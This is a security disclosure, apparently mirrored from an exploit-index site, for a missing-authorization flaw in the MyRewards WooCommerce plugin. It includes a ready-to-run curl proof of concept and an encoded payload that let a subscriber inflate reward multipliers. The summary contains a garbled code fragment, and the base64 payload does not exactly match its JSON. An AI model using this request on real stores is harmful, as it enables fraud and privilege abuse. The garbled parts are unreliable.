## https://sploitus.com/exploit?id=136807E3-F06F-5289-AE22-B1CBE28B8FEE
# CVE-2025-15260: Missing Authorization / Broken Access Control in Plugin - MyRewards โ Loyalty Points and Rewards for WooCommerce
> **Disclaimer:** This repository is created for **educational purposes and ethical disclosure only**. The vulnerability has been responsibly reported to the vendor and patched. Do not use this information to exploit systems without proper authorization.
## Summary
A Critical Broken Access Control / Privilege Escalation vulnerability was discovered in the **MyRewards (WooRewards)** plugin for WooCommerce(versions m_Source->write($data);
```
## Business Impact
* **Financial Loss:** By manipulating the "Order Amount" points multiplier, bad actors can generate infinite reward points and exchange them for high-value discount coupons or free items, bypassing the ecommerce payment gateway.
* **Privilege Escalation:** A standard customer (Subscriber) can perform plugin administration actions.
* **Data Integrity Compromise:** Attackers can deface, alter, or delete existing logitimate reward rules, disrupting the store's marketing logic.
## Proof of Concept (PoC)
The following steps demonstrate how an authenticated Subscriber can exploit this flaw.
### 1. Prerequisites
* Target running WooCommerce with MyRewards v5.6.0.
* Valid credentials for a `subscriber` level account.
* A pre-configured reward system (e.g., "Spend money" earning rule). *Note: The ID of this rule (e.g., `101`) is sequential and easily enumerable by observing AJAX post responses.*
### 2. Payload
We want to update the points multiplier of Rule ID `101` to a `999,999,999,999,999`.
**Initial JSON**
```json
{
"post_id":"101",
"wre_type":"lws_woorewards_events_orderamount",
"lws_woorewards_events_orderamount_multiplier": "999999999999999"
}
```
**Base64 Encoded ('value of line')**
```text
eyJwb3N0X2lkIjoiMTAxIiwid3JlX3R5cGUiOiJsd3Nfd29vcmV3YXJkc19ldmVudHNfb3JlZXJhbW91bnQiLCJsd3Nfd29vcmV3YXJkc19ldmVudHNfb3JlZXJhbW91bnRfbWVsdGlwbGl1ciI6ICI5OTk5OTk5OTk5OTk5OTk5In0
```
### 3. Execute the Attack
Run the following CURL request as a lo-privileged user:
```bash
curl -i -X POST 'http://TARGET_SITE/wp-admin/admin-ajax.php' \
-H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' \
-b '[Subscriber_Cookies_Here]' \
-d 'action=lws_adminpanel_editlist&method=put&id=EventList&line=eyJwb3N0X2lkIjoiMTAxIiwid3JlX3R5cGUiOiJsd3Nfd29vcmV3YXJkc19ldmVudHNfb3JlZXJhbW91bnQiLCJsd3Nfd29vcmV3YXJkc19ldmVudHNfb3JlZXJhbW91bnRfbWVsdGlwbGl1ciI6ICI5OTk5OTk5OTk5OTk5OTk5In0'
```
### 4. Verification
* **Attacker's view:** The server will return `{"status":1}` confirming the update.
* **Administrator's view:** If an Admin visits the Loyalty Settings, they will see the points multiplier for orders has been changed to the astronomical value injected by the attacker.
## Remediation
To fix this issue, update the MyRewards plugin to the latest patched version. The vendor resolved this by:
1. Implementing `current_user_can()` checks within the AJAX controller to verify administrative privileges.
2. Adding `check_ajax_referer()` to validate nonces and prevent Cross-Site Request Forgery (CSRF).
## Timeline
A short log of the disclosure process to show ethical standards were followed:
* **Date (2025-12-29):** Reported to Wordfence / Developer.
* **Date (2026-02-09):** Vulnerability patched / Public disclosure.
## References & Credits
* [Wordfence Vulnerability Database](https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woorewards/myrewards-loyalty-points-and-rewards-for-woocommerce-560-missing-authorization-to-authenticated-subscriber-arbitrary-loyalty-rule-modification)
* [CVE-2025-15260 on NVD](https://nvd.nist.gov/vuln/detail/CVE-2025-15260)
* [MyRewards Plugin on WordPress.org](https://wordpress.org/plugins/woorewards/)